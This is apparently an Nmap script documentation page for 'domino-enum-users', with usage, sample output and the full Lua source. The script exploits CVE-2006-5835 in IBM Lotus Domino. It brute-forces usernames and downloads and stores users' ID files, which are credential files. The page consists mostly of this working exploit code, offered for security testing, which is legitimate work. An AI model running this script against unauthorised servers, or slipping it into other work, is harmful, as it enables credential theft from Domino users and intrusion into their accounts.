<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File domino-enum-users</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth<br/>
<b>Author:</b> Patrik Karlsson<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://nmap.org/nsedoc/scripts/domino-enum-users.html">https://nmap.org/nsedoc/scripts/domino-enum-users.html</a><br/>
<h3>Summary</h3>
<p>Attempts to discover valid IBM Lotus Domino users and download their ID files by exploiting the CVE-2006-5835 vulnerability.</p>
<h3>Arguments</h3>
<table>
<tr><td>domino-enum-users.path:</td><td>The location to which any retrieved ID files are stored</td></tr>
<tr><td>domino-enum-users.username:</td><td>The name of the user from which to retrieve the ID. If this parameter is not specified, the unpwdb library will be used to brute force names of users.</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap --script domino-enum-users -p 1352 &lt;host&gt;</pre>
<h3>Output</h3>
<pre>PORT     STATE SERVICE REASON
1352/tcp open  lotusnotes
| domino-enum-users:
|   User &quot;Patrik Karlsson&quot; found, but not ID file could be downloaded
|   Successfully stored &quot;FFlintstone&quot; in /tmp/FFlintstone.id
|_  Successfully stored &quot;MJacksson&quot; in /tmp/MJacksson.id</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/io.htm">io</a></li>
<li><a href="nmap/libraries/nrpc.htm">nrpc</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/stringaux.htm">stringaux</a></li>
<li><a href="nmap/libraries/table.htm">table</a></li>
<li><a href="nmap/libraries/unpwdb
.htm">unpwdb
</a></li>
</ul>
<h3>Code</h3>
<pre>local io = require &quot;io&quot;
local nrpc = require &quot;nrpc&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local stringaux = require &quot;stringaux&quot;
local table = require &quot;table&quot;
local unpwdb = require &quot;unpwdb&quot;

description = [[
Attempts to discover valid IBM Lotus Domino users and download their ID files by exploiting the CVE-2006-5835 vulnerability.
]]

---
-- @usage
-- nmap --script domino-enum-users -p 1352 &lt;host&gt;
--
-- @output
-- PORT     STATE SERVICE REASON
-- 1352/tcp open  lotusnotes
-- | domino-enum-users:
-- |   User &quot;Patrik Karlsson&quot; found, but not ID file could be downloaded
-- |   Successfully stored &quot;FFlintstone&quot; in /tmp/FFlintstone.id
-- |_  Successfully stored &quot;MJacksson&quot; in /tmp/MJacksson.id
--
--
-- @args domino-enum-users.path the location to which any retrieved ID files are stored
-- @args domino-enum-users.username the name of the user from which to retrieve the ID.
--                          If this parameter is not specified, the unpwdb
--                          library will be used to brute force names of users.
--
-- For more information see:
-- http://www-01.ibm.com/support/docview.wss?rs=463&amp;uid=swg21248026
--
-- Credits
-- -------
-- o Ollie Whitehouse for bringing this to my attention back in the days when
--   it was first discovered and for the c-code on which this is based.

--
-- Version 0.1
-- Created 07/12/2010 - v0.1 - created by Patrik Karlsson &lt;patrik@cqure.net&gt;
--

author = &quot;Patrik Karlsson&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;intrusive&quot;, &quot;auth&quot;}


portrule = shortport.port_or_service(1352, &quot;lotusnotes&quot;, &quot;tcp&quot;, &quot;open&quot;)

--- Saves the ID file to disk
--
-- @param filename string containing the name and full path to the file
-- @param data contains the data
-- @return status true on success, false on failure
-- @return err string containing error message if status is false
local function saveIDFile( filename, data )
  local f = io.open( filename, &quot;w&quot;)
  if ( not(f) ) then
    return false, (&quot;Failed to open file (%s)&quot;):format(filename)
  end
  if ( not(f:write( data ) ) ) then
    return false, (&quot;Failed to write file (%s)&quot;):format(filename)
  end
  f:close()

  return true
end

action = function(host, port)

  local helper = nrpc.Helper:new( host, port )
  local status, data, usernames, err
  local path = stdnse.get_script_args(SCRIPT_NAME .. &quot;.path&quot;)
  local result = {}
  local save_file = false
  local counter = 0
  local domino_username = stdnse.get_script_args(SCRIPT_NAME .. &quot;.username&quot;)
  if ( domino_username ) then
    usernames = ( function()
      local b = true
      return function()
        if ( b ) then
          b=false;
          return domino_username
        end
      end
    end )()
  else
    status, usernames = unpwdb.usernames()
    if ( not(status) ) then
      return false, &quot;Failed to load usernames&quot;
    end
  end

  for username in usernames do
    status = helper:connect()
    if ( not(status) ) then
      err = (&quot;ERROR: Failed to connect to Lotus Domino Server %s&quot;):format( host.ip )
      break
    end

    status, data = helper:isValidUser( username )
    helper:disconnect()

    if ( status and data and path ) then
      local filename = path .. &quot;/&quot; .. stringaux.filename_escape(username .. &quot;.id&quot;)
      local status, err = saveIDFile( filename, data )

      if ( status ) then
        table.insert(result, (&quot;Successfully stored \&quot;%s\&quot; in %s&quot;):format(username, filename) )
      else
        stdnse.debug1(&quot;%s&quot;, err)
        table.insert(result, (&quot;Failed to store \&quot;%s\&quot; to %s&quot;):format(username, filename) )
      end
    elseif( status and data ) then
      table.insert(result, (&quot;Successfully retrieved ID for \&quot;%s\&quot; (to store set the domino-enum-users.path argument)&quot;):format(username) )
    elseif ( status ) then
      table.insert(result, (&quot;User \&quot;%s\&quot; found, but no ID file could be downloaded&quot;):format(username) )
    end

    counter = counter + 1
  end

  if ( #result == 0 ) then
    table.insert(result, (&quot;Guessed %d usernames, none were found&quot;):format(counter) )
  end

  result = stdnse.format_output( true, result )
  if ( err ) then
    result = result .. (&quot;  \n  %s&quot;):format(err)
  end

  return result
end</pre>
